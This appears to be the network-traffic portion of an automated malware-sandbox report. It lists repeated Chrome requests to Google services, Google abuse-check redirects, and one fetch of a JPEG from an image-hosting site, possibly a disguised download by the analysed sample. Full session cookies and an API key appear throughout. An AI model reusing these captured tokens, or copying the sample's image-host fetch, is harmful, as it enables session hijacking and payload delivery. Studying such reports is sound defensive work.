Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGM3czrEGIjA-kmni6OpCb0sK0OJXQ-xgahRJhOOfp9sjhLJd6-GVaRKXjhN1j2AjiNvlTeHQJ0kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=NZ4brZslJLGnLVjTcreRD7lxEjX66aaCdKJhfnLEmxYExEfC3vECMFtiyUjZvn7jae_o9oH2nBPpgCm69apGRisPWAZC8cIzzLMfEsrMUupy8H-VMdctX0MV-nM5BpvsPPq5g-KgY4-U7c7J8ZG6JIScU18MD4zxbS5XoJkeACk
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGM3czrEGIjBNTSrZMnzy_CNunBaz13qflxACo4Q-tsOSnHKAZkmU-cbBSfOo5zTFuO2giXO-OOgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=GwJ0Iectm-lpCwc4nfg6yl76x5rDcChb_OZXpuZBZxQYDQD43qXE3RgxQhpek_-VL4TlNemCmiInGg1ienj0ACo7Y0l_w2_7OON40wJAlTtDNPhRveX68cyivZV8msHFXSUrHH6PaG8N0u_5ssJl432FDO5e0iUo_u8WbT0y96E
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGM3czrEGIjD14lIpu-PsNii6E4o0fMBFRkN2h3N6esk6aoD4sSuLrsG2vyw7ZwZNlz-aqGHVtk0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGP3czrEGIjDS9DZdEFTLZ0rQmHh8BVnuUqsONDjuq8gSWsSs2KcopYUQpgK9qrehq87kCUMiP-IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGP3czrEGIjAXIG4uWsMc1yHwGtbWnQ4BrBFLGzkrT3CpFRrCGx74-yixjHV6JAEPUuq6MDX-WosyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGP3czrEGIjBmWrrWv04dQi66TiEKCyc8WmpF7SUcXBS_pm4LOE_wEtYKIhHCHVOYQHcKb14RilQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGIndzrEGIjB0ZZgq5v5iPP5i9AevO7TxIMVCQ7xcfFi2Nbu1H-ak-I-R3dc52fJoY_ZFhpfWqjwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGIndzrEGIjC8eEI24_WhU7dZnkgPs0_lq9Lk0HfgIBO-NRHmzbWmaWr0JShxAoSnHqY9I-95pvoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGIndzrEGIjAWPrWKos41NT4kmtwOzV0So1qqWn5ONKLkds_6fO99Z83kO0tED8KmXN17uSmsMb4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKXdzrEGIjBNT6XWfEtjFm9nIpUgsJZmz_FuFizG46SHYcabI3VFdGgVBY4JehVZpV8LQW1x5ysyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKXdzrEGIjDskkdDn1tgsmzMh-_d0Ghi7EcIbfH38ShoKHeRtyYItfWKDYikcsnbE8W9gvwCuT4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKXdzrEGIjB41r-JEwv8u4RzZMcO3uf3_AVoLOwrfZ1qWrP1Y7YHnyIzpJ09Xc86C2JU0Bi2aeUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-15; NID=513=BBtGkmwz6QSLeTf-HCFNAS8XefLfk1-tPY5Tvs6iFdmzDgVhsNrGZGyABeaNQdf4q77K9bxPo277gzhYpSOI2G3LkzlAnZeEJnp0Zu7Q5KOn4Lvz8MKT48rUFKKaWeqRqCAAsJtcw6YzOpXkYrnQGwT65M3J6GjD7Rp9Bnqe93I
